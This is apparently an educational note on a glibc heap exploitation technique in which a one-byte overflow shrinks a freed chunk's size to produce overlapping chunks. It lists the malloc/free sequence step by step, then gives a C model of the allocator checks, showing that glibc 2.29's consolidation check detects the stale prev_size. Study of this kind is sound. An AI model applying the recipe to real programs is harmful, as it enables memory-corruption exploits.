For this method to work:
- You just need a single-byte overflow into the size metadata of a chunk.
- malloc( overflowing_chunk )
- malloc(0x220) # the chunk that is going to be shrunk
- Make sure you fill it with "A"*0x1f0+pack(0x200)+"B"*40, so that it passes the prevsize(next_chunk) == size check.
  (NOTE: "A"*0x1f0 because we are filling from (p+0x10); this check is done in malloc --> unlink --> check)
- malloc(0x100) # the chunk that is going to be fooled, C
- free(2nd chunk)
- Overflow the second chunk; now size = 0x200, but the 3rd chunk still thinks its size is 0x230 because its prev_size will not be updated.
- malloc(0x100) # b1
- malloc(x) # this is the chunk you can overflow completely
- malloc(y) # the wall
- free(b1)
- free(c)
- malloc(0x300) # voila, the magic chunk which allows us to overflow
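The whole sequence hinges on chunk C keeping a stale prev_size (0x230) after the chunk in front of it has been shrunk to 0x200. The following is an added example, not code from the page and not glibc's code: a simplified C model of the two metadata consistency checks that glibc's allocator performs on this path (the unlink-time "chunksize(P) == prev_size(next_chunk(P))" test, which glibc 2.26 reports as "corrupted size vs. prev_size", and the backward-consolidation test added in glibc 2.29, reported as "corrupted size vs. prev_size while consolidating"). The heap layouts are constructed in memory from the sizes the page gives (2nd chunk at offset 0, C at 0x230); no real allocator is involved. It shows that the fake prev_size written by the fill satisfies the first check, as the page states, while the second check, which looks at the actual size of the chunk that prev_size points back to, still rejects the stale 0x230 when C is freed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Simplified model of a 64-bit glibc chunk header: prev_size, then size whose
 * low three bits are flags (bit 0 = PREV_INUSE). Assumed layout, not glibc's code. */
typedef struct {
    uint64_t prev_size;
    uint64_t size;
} chunk_hdr;

#define SIZE_BITS    0x7UL
#define PREV_INUSE   0x1UL
#define CHUNKSIZE(h) ((h)->size & ~SIZE_BITS)

enum { HEAP_LEN = 0x400 };

static chunk_hdr *hdr_at(uint8_t *heap, size_t off) { return (chunk_hdr *)(heap + off); }

/* Check 1 (unlink-time): chunksize(P) must equal prev_size(next_chunk(P)).
 * Returns 1 if consistent, 0 if the chunk would be rejected. */
int unlink_size_ok(uint8_t *heap, size_t off)
{
    chunk_hdr *p = hdr_at(heap, off);
    size_t next = off + CHUNKSIZE(p);
    if (next + sizeof(chunk_hdr) > HEAP_LEN) return 0;   /* next header outside the heap */
    return hdr_at(heap, next)->prev_size == CHUNKSIZE(p);
}

/* Check 2 (consolidate-time): when a chunk with PREV_INUSE clear is freed,
 * follow prev_size backwards and require that the chunk found there really
 * has that size. Returns 1 if consistent, 0 if rejected. */
int consolidate_backward_ok(uint8_t *heap, size_t off)
{
    chunk_hdr *p = hdr_at(heap, off);
    if (p->size & PREV_INUSE) return 1;                  /* nothing to merge, nothing to check */
    uint64_t prevsize = p->prev_size;
    if (prevsize == 0 || prevsize > off) return 0;       /* would point outside the heap */
    return CHUNKSIZE(hdr_at(heap, off - prevsize)) == prevsize;
}

/* Constructed layouts (not captured from a real process), using the page's sizes:
 * 2nd chunk at 0 (malloc(0x220) -> 0x230 bytes), C at 0x230 (malloc(0x100) -> 0x110). */
void layout_unshrunk(uint8_t *heap)
{
    memset(heap, 0, HEAP_LEN);
    hdr_at(heap, 0)->size = 0x230 | PREV_INUSE;   /* 2nd chunk, intact size */
    hdr_at(heap, 0x230)->prev_size = 0x230;       /* written by free(2nd chunk) */
    hdr_at(heap, 0x230)->size = 0x110;            /* C; PREV_INUSE clear: predecessor is free */
}

void layout_after_shrink(uint8_t *heap, int with_fake_prev_size)
{
    layout_unshrunk(heap);
    hdr_at(heap, 0)->size = 0x200 | PREV_INUSE;   /* low byte overwritten: 0x230 -> 0x200 */
    if (with_fake_prev_size)
        hdr_at(heap, 0x200)->prev_size = 0x200;   /* the pack(0x200) at user offset 0x1f0 */
    /* C's prev_size at 0x230 still says 0x230: it is never refreshed */
}

void layout_after_b1_freed(uint8_t *heap)
{
    layout_after_shrink(heap, 1);
    /* b1 = malloc(0x100) was carved from the shrunken chunk and freed again: its
     * header sits at 0 and free() wrote 0x110 into the following prev_size slot. */
    hdr_at(heap, 0)->size = 0x110 | PREV_INUSE;
    hdr_at(heap, 0x110)->prev_size = 0x110;
    hdr_at(heap, 0x110)->size = 0xf0;             /* remainder, PREV_INUSE clear */
}

/* Both checks accept a layout whose metadata is consistent. */
int consistent_layout_passes_both(void)
{
    uint8_t heap[HEAP_LEN];
    layout_unshrunk(heap);
    return unlink_size_ok(heap, 0) && consolidate_backward_ok(heap, 0x230);
}

/* Check 1 on its own is satisfied by the fake prev_size the fill plants (and
 * would fail without it). */
int fake_prev_size_passes_unlink_check(void)
{
    uint8_t heap[HEAP_LEN];
    layout_after_shrink(heap, 1);
    int with = unlink_size_ok(heap, 0);
    layout_after_shrink(heap, 0);
    int without = unlink_size_ok(heap, 0);
    return with && !without;
}

/* Check 2 catches the stale 0x230 in C at the moment free(c) consolidates backwards. */
int stale_prev_size_detected(void)
{
    uint8_t heap[HEAP_LEN];
    layout_after_b1_freed(heap);
    return !consolidate_backward_ok(heap, 0x230);
}

int main(void)
{
    printf("consistent layout passes both checks: %d\n", consistent_layout_passes_both());
    printf("fake prev_size passes unlink check:   %d\n", fake_prev_size_passes_unlink_check());
    printf("stale prev_size caught on free(c):    %d\n", stale_prev_size_detected());
    return 0;
}
```

The second check is the one that closes this primitive: the fill can make the shrunken chunk's own metadata look self-consistent, but it cannot change the fact that the chunk found 0x230 bytes before C now carries b1's 0x110 size. Builds against a glibc without that check (before 2.29) are the ones where the sequence above still reaches the overlapping chunk.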